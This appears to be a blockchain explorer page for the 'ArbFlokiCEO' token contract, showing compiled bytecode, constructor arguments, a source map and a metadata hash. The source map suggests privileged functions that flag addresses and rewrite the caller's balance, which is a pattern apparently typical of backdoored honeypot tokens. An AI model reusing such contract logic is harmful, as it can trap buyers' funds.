160a01b038716600090815260016020526040902054909150610a529082610b79565b6001600160a01b0380881660008181526001602052604090819020939093559151908916907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610aa69089815260200190565b60405180910390a350505050505050565b6000546001600160a01b031633146105045760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103df565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b60006107ec8284610d1d565b60006107ec8284610d30565b60006107ec8284610cf3565b600060208083528351808285015260005b81811015610bb257858101830151858201604001528201610b96565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610bea57600080fd5b919050565b60008060408385031215610c0257600080fd5b610c0b83610bd3565b946020939093013593505050565b600060208284031215610c2b57600080fd5b6107ec82610bd3565b600080600060608486031215610c4957600080fd5b610c5284610bd3565b9250610c6060208501610bd3565b9150604084013590509250925092565b60008060408385031215610c8357600080fd5b610c8c83610bd3565b9150610c9a60208401610bd3565b90509250929050565b600181811c90821680610cb757607f821691505b602082108103610cd757634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561039657610396610cdd565b808202811582820484141761039657610396610cdd565b8181038181111561039657610396610cdd565b600082610d4d57634e487b7160e01b600052601260045260246000fd5b50049056fea26469706673582212206dfe24140428d3c738d6e92b1422bb2de30715684d850255105eb889e49cd32f64736f6c6343000811003300000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000b417262466c6f6b6943454f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008466c6f6b6943454f000000000000000000000000000000000000000000000000

Deployed ByteCode Sourcemap

14288:11220:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15281:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17634:201;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;17634:201:0;1004:187:1;21356:237:0;;;;;;:::i;:::-;;:::i;:::-;;20805:218;;;;;;:::i;:::-;;:::i;16401:108::-;16489:12;;16401:108;;;1533:25:1;;;1521:2;1506:18;16401:108:0;1387:177:1;18415:295:0;;;;;;:::i;:::-;;:::i;21253:95::-;;;;;;:::i;:::-;-1:-1:-1;;;;;21328:12:0;21303:4;21328:12;;;:7;:12;;;;;;;;;21253:95;16243:93;;;16326:2;2044:36:1;;2032:2;2017:18;16243:93:0;1902:184:1;19119:238:0;;;;;;:::i;:::-;;:::i;16572:127::-;;;;;;:::i;:::-;-1:-1:-1;;;;;16673:18:0;16646:7;16673:18;;;:9;:18;;;;;;;16572:127;12240:103;;;:::i;21031:214::-;;;;;;:::i;:::-;;:::i;11590:87::-;11636:7;11663:6;-1:-1:-1;;;;;11663:6:0;11590:87;;;-1:-1:-1;;;;;2255:32:1;;;2237:51;;2225:2;2210:18;11590:87:0;2091:203:1;15500:104:0;;;:::i;19860:424::-;;;;;;:::i;:::-;;:::i;16907:193::-;;;;;;:::i;:::-;;:::i;14513:21::-;;;;;-1:-1:-1;;;;;14513:21:0;;;14634:52;;14669:17;14634:52;;17163:151;;;;;;:::i;:::-;;:::i;12498:201::-;;;;;;:::i;:::-;;:::i;15281:100::-;15335:13;15368:5;15361:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15281:100;:::o;17634:201::-;17717:4;10307:10;17773:32;10307:10;17789:7;17798:6;17773:8;:32::i;:::-;17823:4;17816:11;;;17634:201;;;;;:::o;21356:237::-;21413:5;;-1:-1:-1;;;;;21413:5:0;10307:10;21413:21;21409:177;;21451:14;;-1:-1:-1;;;21451:14:0;;;;;;3151:2:1;3133:21;;;3190:1;3170:18;;;3163:29;-1:-1:-1;;;3223:2:1;3208:18;;3201:34;3267:2;3252:18;;2949:327;21451:14:0;;;;;;;;21409:177;21486:5;;10307:10;-1:-1:-1;;;;;21486:5:0;;;:21;21482:104;;21549:19;14669:17;21562:5;21549:12;:19::i;:::-;:25;;21569:5;21549:25;:::i;:::-;10307:10;21523:23;;;;:9;:23;;;;;:51;21482:104;21356:237;:::o;20805:218::-;20867:5;;-1:-1:-1;;;;;20867:5:0;10307:10;20867:21;20863:70;;20905:16;;-1:-1:-1;;;20905:16:0;;3745:2:1;20905:16:0;;;3727:21:1;3784:1;3764:18;;;3757:29;-1:-1:-1;;;3802:18:1;;;3795:36;3848:18;;20905:16:0;3543:329:1;20863:70:0;20947:5;;10307:10;-1:-1:-1;;;;;20947:5:0;;;:21;20943:73;;-1:-1:-1;;;;;20984:12:0;20999:5;20984:12;;;:7;:12;;;;;:20;;-1:-1:-1;;20984:20:0;;;20805:218::o;18415:295::-;18546:4;10307:10;18604:38;18620:4;10307:10;18635:6;18604:15;:38::i;:::-;18653:27;18663:4;18669:2;18673:6;18653:9;:27::i;:::-;-1:-1:-1;18698:4:0;;18415:295;-1:-1:-1;;;;18415:295:0:o;19119:238::-;19207:4;10307:10;19263:64;10307:10;19279:7;19316:10;19288:25;10307:10;19279:7;19288:9;:25::i;:::-;:38;;;;:::i;:::-;19263:8;:64::i;12240:103::-;11474:15;:13;:15::i;:::-;12305:30:::1;12332:1;12305:18;:30::i;:::-;12240:103::o:0;21031:214::-;21090:5;;-1:-1:-1;;;;;21090:5:0;10307:10;21090:21;21086:70;;21128:16;;-1:-1:-1;;;21128:16:0;;3745:2:1;21128:16:0;;;3727:21:1;3784:1;3764:18;;;3757:29;-1:-1:-1;;;3802:18:1;;;3795:36;3848:18;;21128:16:0;3543:329:1;21086:70:0;21170:5;;10307:10;-1:-1:-1;;;;;21170:5:0;;;:21;21166:72;;-1:-1:-1;;;;;21207:12:0;;;;;;:7;:12;;;;;:19;;-1:-1:-1;;21207:19:0;21222:4;21207:19;;;21031:214;:::o;15500:104::-;15556:13;15589:7;15582:14;;;;;:::i;19860:424::-;19953:4;10307:10;19953:4;20036:25;10307:10;20053:7;20036:9;:25::i;:::-;20009:52;;20100:15;20080:16;:35;;20072:85;;;;-1:-1:-1;;;20072:85:0;;4079:2:1;20072:85:0;;;4061:21:1;4118:2;4098:18;;;4091:30;4157:34;4137:18;;;4130:62;-1:-1:-1;;;4208:18:1;;;4201:35;4253:19;;20072:85:0;3877:401:1;20072:85:0;20185:60;20194:5;20201:7;20229:15;20210:16;:34;20185:8;:60::i;16907:193::-;16986:4;10307:10;17042:28;10307:10;17059:2;17063:6;17042:9;:28::i;17163:151::-;-1:-1:-1;;;;;17279:18:0;;;17252:7;17279:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;17163:151::o;12498:201::-;11474:15;:13;:15::i;:::-;-1:-1:-1;;;;;12587:22:0;::::1;12579:73;;;::::0;-1:-1:-1;;;12579:73:0;;4485:2:1;12579:73:0::1;::::0;::::1;4467:21:1::0;4524:2;4504:18;;;4497:30;4563:34;4543:18;;;4536:62;-1:-1:-1;;;4614:18:1;;;4607:36;4660:19;;12579:73:0::1;4283:402:1::0;12579:73:0::1;12663:28;12682:8;12663:18;:28::i;24393:380::-:0;-1:-1:-1;;;;;24529:19:0;;24521:68;;;;-1:-1:-1;;;24521:68:0;;4892:2:1;24521:68:0;;;4874:21:1;4931:2;4911:18;;;4904:30;4970:34;4950:18;;;4943:62;-1:-1:-1;;;5021:18:1;;;5014:34;5065:19;;24521:68:0;4690:400:1;24521:68:0;-1:-1:-1;;;;;24608:21:0;;24600:68;;;;-1:-1:-1;;;24600:68:0;;5297:2:1;24600:68:0;;;5279:21:1;5336:2;5316:18;;;5309:30;5375:34;5355:18;;;5348:62;-1:-1:-1;;;5426:18:1;;;5419:32;5468:19;;24600:68:0;5095:398:1;24600:68:0;-1:-1:-1;;;;;24681:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;24733:32;;1533:25:1;;;24733:32:0;;1506:18:1;24733:32:0;;;;;;;24393:380;;;:::o;3533:98::-;3591:7;3618:5;3622:1;3618;:5;:::i;:::-;3611:12;3533:98;-1:-1:-1;;;3533:98:0:o;25064:441::-;25199:24;25226:25;25236:5;25243:7;25226:9;:25::i;:::-;25199:52;;-1:-1:-1;;25266:16:0;:37;25262:236;;25348:6;25328:16;:26;;25320:68;;;;-1:-1:-1;;;25320:68:0;;5873:2:1;25320:68:0;;;5855:21:1;5912:2;5892:18;;;5885:30;5951:31;5931:18;;;5924:59;6000:18;;25320:68:0;5671:353:1;25320:68:0;25424:51;25433:5;25440:7;25468:6;25449:16;:25;25424:8;:51::i;:::-;25188:317;25064:441;;;:::o;21624:756::-;-1:-1:-1;;;;;21755:18:0;;21747:68;;;;-1:-1:-1;;;21747:68:0;;6231:2:1;21747:68:0;;;6213:21:1;6270:2;6250:18;;;6243:30;6309:34;6289:18;;;6282:62;-1:-1:-1;;;6360:18:1;;;6353:35;6405:19;;21747:68:0;6029:401:1;21747:68:0;-1:-1:-1;;;;;21834:16:0;;21826:64;;;;-1:-1:-1;;;21826:64:0;;6637:2:1;21826:64:0;;;6619:21:1;6676:2;6656:18;;;6649:30;6715:34;6695:18;;;6688:62;-1:-1:-1;;;6766:18:1;;;6759:33;6809:19;;21826:64:0;6435:399:1;21826:64:0;-1:-1:-1;;;;;21919:13:0;;21901:15;21919:13;;;:7;:13;;;;;;;;21943:72;;;;21991:12;;21982:21;;:6;:21;:::i;:::-;21973:30;;21943:72;-1:-1:-1;;;;;22042:15:0;;22025;22042;;;:9;:15;;;;;;22076:17;;;;22068:68;;;;-1:-1:-1;;;22068:68:0;;7041:2:1;22068:68:0;;;7023:21:1;7080:2;7060:18;;;7053:30;7119:34;7099:18;;;7092:62;-1:-1:-1;;;7170:18:1;;;7163:36;7216:19;;22068:68:0;6839:402:1;22068:68:0;22165:19;:7;22177:6;22165:11;:19::i;:::-;-1:-1:-1;;;;;22147:15:0;;;;;;:9;:15;;;;;:37;;;;22222:4;;22211:25;;22232:3;;22211:16;;:6;;:10;:16::i;:::-;:20;;:25::i;:::-;22195:41;-1:-1:-1;22247:12:0;22262:17;:6;22195:41;22262:10;:17::i;:::-;-1:-1:-1;;;;;22307:13:0;;;;;;:9;:13;;;;;;22247:32;;-1:-1:-1;22307:23:0;;22247:32;22307:17;:23::i;:::-;-1:-1:-1;;;;;22290:13:0;;;;;;;:9;:13;;;;;;;:40;;;;22346:26;;;;;;;;;;22365:6;1533:25:1;;1521:2;1506:18;;1387:177;22346:26:0;;;;;;;;21736:644;;;;21624:756;;;:::o;11755:134::-;11636:7;11663:6;-1:-1:-1;;;;;11663:6:0;10307:10;11821:23;11813:68;;;;-1:-1:-1;;;11813:68:0;;7448:2:1;11813:68:0;;;7430:21:1;;;7467:18;;;7460:30;7526:34;7506:18;;;7499:62;7578:18;;11813:68:0;7246:356:1;12859:191:0;12933:16;12952:6;;-1:-1:-1;;;;;12969:17:0;;;-1:-1:-1;;;;;;12969:17:0;;;;;;13002:40;;12952:6;;;;;;;13002:40;;12933:16;13002:40;12922:128;12859:191;:::o;3176:98::-;3234:7;3261:5;3265:1;3261;:5;:::i;3932:98::-;3990:7;4017:5;4021:1;4017;:5;:::i;2795:98::-;2853:7;2880:5;2884:1;2880;:5;:::i;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1196:186::-;1255:6;1308:2;1296:9;1287:7;1283:23;1279:32;1276:52;;;1324:1;1321;1314:12;1276:52;1347:29;1366:9;1347:29;:::i;1569:328::-;1646:6;1654;1662;1715:2;1703:9;1694:7;1690:23;1686:32;1683:52;;;1731:1;1728;1721:12;1683:52;1754:29;1773:9;1754:29;:::i;:::-;1744:39;;1802:38;1836:2;1825:9;1821:18;1802:38;:::i;:::-;1792:48;;1887:2;1876:9;1872:18;1859:32;1849:42;;1569:328;;;;;:::o;2299:260::-;2367:6;2375;2428:2;2416:9;2407:7;2403:23;2399:32;2396:52;;;2444:1;2441;2434:12;2396:52;2467:29;2486:9;2467:29;:::i;:::-;2457:39;;2515:38;2549:2;2538:9;2534:18;2515:38;:::i;:::-;2505:48;;2299:260;;;;;:::o;2564:380::-;2643:1;2639:12;;;;2686;;;2707:61;;2761:4;2753:6;2749:17;2739:27;;2707:61;2814:2;2806:6;2803:14;2783:18;2780:38;2777:161;;2860:10;2855:3;2851:20;2848:1;2841:31;2895:4;2892:1;2885:15;2923:4;2920:1;2913:15;2777:161;;2564:380;;;:::o;3281:127::-;3342:10;3337:3;3333:20;3330:1;3323:31;3373:4;3370:1;3363:15;3397:4;3394:1;3387:15;3413:125;3478:9;;;3499:10;;;3496:36;;;3512:18;;:::i;5498:168::-;5571:9;;;5602;;5619:15;;;5613:22;;5599:37;5589:71;;5640:18;;:::i;7607:128::-;7674:9;;;7695:11;;;7692:37;;;7709:18;;:::i;7740:217::-;7780:1;7806;7796:132;;7850:10;7845:3;7841:20;7838:1;7831:31;7885:4;7882:1;7875:15;7913:4;7910:1;7903:15;7796:132;-1:-1:-1;7942:9:1;;7740:217::o

Metadata Hash

ipfs://6dfe24140428d3c738d6e92b1422bb2de30715684d850255105eb889e49cd32f
Loading